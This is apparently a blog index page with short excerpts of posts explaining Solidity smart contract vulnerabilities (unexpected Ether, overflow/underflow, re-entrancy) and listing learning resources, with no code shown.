Solidity Security Vulnerabilities: Unexpected Ether

A contract may be vulnerable if it incorrectly uses address(this).balance. I modified the EtherGame contract from https://github.com/sigp/solidity-security-blog#3-unexpected-ether-1 wrote the Player and Attacker contact to demonstrate this vulnerability. How to Test: Deploy EtherGame and note the contract’s address Deploy the Player contract with 5 Ether and pass the address of EtherGame’s address to the constructor Deploy … Read more

Solidity Security Vulnerabilities: Arithmetic Over/Under Flows

Prior to v0.8.1, Solidity contracts were vulnerable to over/underflow attacks. This vulnerability caused mathematical operations of +, – and * to be exploited if the attacker can control the value of at least one operand. A demo for over/underflow behaviour is provided below: To see the vulnerability in action, lets see the contract from one … Read more

Solidity Security Vulnerabilities

Here is a list of smart contract security vulnerabilities I made while going through this blog post by Sigma Prime: https://blog.sigmaprime.io/solidity-security.html. Some vulnerabilities have been fixed since the blog was published and I have highlighted the same where ever necessary. This is going to be a series of posts, listed below: https://aaruni.io/2022/08/solidity-security-vulnerabilities-re-entrancy https://aaruni.io/2022/08/solidity-security-vulnerabilities-arithmetic-over-under-flows https://aaruni.io/2022/08/solidity-security-vulnerabilities-unexpected-ether https://aaruni.io/2022/08/solidity-security-vulnerabilities-tx-origin-authentication … Read more

Solidity Security Vulnerabilities: Re-Entrancy

Re-entrancy, as the name suggests, is when a Contract A calls a function in an untrusted contract B which then calls A again maliciously. In the example I provide below, the contract named “Vulnerable” is a faucet that provides 10 wei per week to any caller. Our “Attacker” contract exploits the fact that: The Vulnerable … Read more

Hello World or How I learned Solidity Security Principles

This is a list of resources that I used in my journey towards learning about Ethereum, Solidity and its security landscape: If you are like me and want to begin by learning about blockchain fundamentals then start with this intro: https://www.youtube.com/watch?v=_160oMzblY8 For a deep dive into Ethereum, read the first 6 chapters of the Mastering … Read more